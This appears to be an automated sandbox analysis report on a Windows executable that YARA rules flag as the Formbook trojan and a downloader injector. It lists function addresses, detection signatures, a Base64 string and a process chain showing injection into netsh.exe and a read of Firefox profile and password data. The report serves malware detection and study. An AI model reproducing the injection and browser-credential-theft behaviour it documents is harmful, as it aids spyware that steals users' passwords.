Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0118EFA0 1_2_0118EFA0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01102FC8 1_2_01102FC8
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CEE26 1_2_011CEE26
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110E59 1_2_01110E59
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01122E90 1_2_01122E90
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CCE93 1_2_011CCE93
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CEEDB 1_2_011CEEDB
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011DB16B 1_2_011DB16B
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0114516C 1_2_0114516C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FF172 1_2_010FF172
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111B1B0 1_2_0111B1B0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011170C0 1_2_011170C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BF0CC 1_2_011BF0CC
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C70E9 1_2_011C70E9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CF0E0 1_2_011CF0E0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C132D 1_2_011C132D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010FD34C 1_2_010FD34C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0115739A 1_2_0115739A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011152A0 1_2_011152A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112B2C0 1_2_0112B2C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112D2F0 1_2_0112D2F0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B12ED 1_2_011B12ED
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C7571 1_2_011C7571
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AD5B0 1_2_011AD5B0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D95C3 1_2_011D95C3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CF43F 1_2_011CF43F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01101460 1_2_01101460
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CF7B0 1_2_011CF7B0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01155630 1_2_01155630
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C16CC 1_2_011C16CC
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A5910 1_2_011A5910
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01119950 1_2_01119950
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112B950 1_2_0112B950
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0117D800 1_2_0117D800
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011138E0 1_2_011138E0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CFB76 1_2_011CFB76
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112FB80 1_2_0112FB80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01185BF0 1_2_01185BF0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0114DBF9 1_2_0114DBF9
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CFA49 1_2_011CFA49
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C7A46 1_2_011C7A46
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01183A6C 1_2_01183A6C
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01155AA0 1_2_01155AA0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011ADAAC 1_2_011ADAAC
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B1AA3 1_2_011B1AA3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BDAC6 1_2_011BDAC6
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C1D5A 1_2_011C1D5A
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01113D40 1_2_01113D40
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C7D73 1_2_011C7D73
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112FDC0 1_2_0112FDC0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01189C32 1_2_01189C32
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CFCF2 1_2_011CFCF2
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CFF09 1_2_011CFF09
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01111F92 1_2_01111F92
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CFFB1 1_2_011CFFB1
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010D3FD5 1_2_010D3FD5
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010D3FD2 1_2_010D3FD2
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01119EB0 1_2_01119EB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_038403E6 4_2_038403E6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0378E3F0 4_2_0378E3F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383A352 4_2_0383A352
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_038002C0 4_2_038002C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03820274 4_2_03820274
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_038341A2 4_2_038341A2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_038401AA 4_2_038401AA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_038381CC 4_2_038381CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03770100 4_2_03770100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0381A118 4_2_0381A118
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03808158 4_2_03808158
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03812000 4_2_03812000
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03780770 4_2_03780770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037A4750 4_2_037A4750
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0377C7C0 4_2_0377C7C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0379C6E0 4_2_0379C6E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03840591 4_2_03840591
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03780535 4_2_03780535
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0382E4F6 4_2_0382E4F6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03824420 4_2_03824420
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03832446 4_2_03832446
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03836BD7 4_2_03836BD7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383AB40 4_2_0383AB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0377EA80 4_2_0377EA80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03796962 4_2_03796962
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0384A9A6 4_2_0384A9A6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037829A0 4_2_037829A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0378A840 4_2_0378A840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03782840 4_2_03782840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037AE8F0 4_2_037AE8F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037668B8 4_2_037668B8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037F4F40 4_2_037F4F40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037A0F30 4_2_037A0F30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037C2F28 4_2_037C2F28
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03822F30 4_2_03822F30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03772FC8 4_2_03772FC8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037FEFA0 4_2_037FEFA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383CE93 4_2_0383CE93
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03780E59 4_2_03780E59
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383EEDB 4_2_0383EEDB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383EE26 4_2_0383EE26
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03792E90 4_2_03792E90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0378AD00 4_2_0378AD00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0377ADE0 4_2_0377ADE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0381CD1F 4_2_0381CD1F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03798DBF 4_2_03798DBF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03820CB5 4_2_03820CB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03780C00 4_2_03780C00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03770CF2 4_2_03770CF2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0376D34C 4_2_0376D34C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383132D 4_2_0383132D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037C739A 4_2_037C739A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_038212ED 4_2_038212ED
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0379D2F0 4_2_0379D2F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0379B2C0 4_2_0379B2C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037852A0 4_2_037852A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0376F172 4_2_0376F172
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B516C 4_2_037B516C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0378B1B0 4_2_0378B1B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0384B16B 4_2_0384B16B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0382F0CC 4_2_0382F0CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383F0E0 4_2_0383F0E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_038370E9 4_2_038370E9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037870C0 4_2_037870C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383F7B0 4_2_0383F7B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037C5630 4_2_037C5630
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_038316CC 4_2_038316CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0381D5B0 4_2_0381D5B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_038495C3 4_2_038495C3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03837571 4_2_03837571
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03771460 4_2_03771460
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383F43F 4_2_0383F43F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037BDBF9 4_2_037BDBF9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037F5BF0 4_2_037F5BF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383FB76 4_2_0383FB76
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0379FB80 4_2_0379FB80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037F3A6C 4_2_037F3A6C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03821AA3 4_2_03821AA3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0381DAAC 4_2_0381DAAC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0382DAC6 4_2_0382DAC6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03837A46 4_2_03837A46
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383FA49 4_2_0383FA49
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037C5AA0 4_2_037C5AA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03789950 4_2_03789950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0379B950 4_2_0379B950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03815910 4_2_03815910
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037ED800 4_2_037ED800
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037838E0 4_2_037838E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383FFB1 4_2_0383FFB1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383FF09 4_2_0383FF09
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03781F92 4_2_03781F92
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03789EB0 4_2_03789EB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03783D40 4_2_03783D40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0379FDC0 4_2_0379FDC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03831D5A 4_2_03831D5A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_03837D73 4_2_03837D73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037F9C32 4_2_037F9C32
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_0383FCF2 4_2_0383FCF2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C111D0 4_2_00C111D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C0C390 4_2_00C0C390
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C0C5B0 4_2_00C0C5B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C0A62D 4_2_00C0A62D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C0A630 4_2_00C0A630
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C12D30 4_2_00C12D30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C29D70 4_2_00C29D70
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: String function: 01145130 appears 58 times
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: String function: 010FB970 appears 262 times
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: String function: 01157E54 appears 107 times
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: String function: 0117EA12 appears 86 times
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: String function: 0118F290 appears 103 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 037C7E54 appears 107 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 037FF290 appears 103 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0376B970 appears 262 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 037B5130 appears 58 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 037EEA12 appears 86 times
PE file contains executable resources (Code or Archives)
Source: yZcecBUXN7.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Sample file is different than original file name gathered from version info
Source: yZcecBUXN7.exe, 00000000.00000002.1626357622.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs yZcecBUXN7.exe
Source: yZcecBUXN7.exe, 00000000.00000002.1626915170.0000000003A75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
Source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
Source: yZcecBUXN7.exe, 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
Source: yZcecBUXN7.exe, 00000000.00000000.1623598827.00000000006D2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
Source: yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
Source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000011FD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs yZcecBUXN7.exe
Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
Source: yZcecBUXN7.exe Binary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
Uses 32bit PE files
Source: yZcecBUXN7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: yZcecBUXN7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkListView.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkListView.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkComboBox.cs Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkComboBox.cs Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@14/12
Source: C:\Users\user\Desktop\yZcecBUXN7.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yZcecBUXN7.exe.log Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\netsh.exe File created: C:\Users\user\AppData\Local\Temp\1-00F23L Jump to behavior
Source: yZcecBUXN7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: yZcecBUXN7.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: netsh.exe, 00000004.00000002.4123105715.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4123105715.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.2195893631.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: yZcecBUXN7.exe ReversingLabs: Detection: 28%
Source: yZcecBUXN7.exe Virustotal: Detection: 37%
Source: unknown Process created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe" Jump to behavior
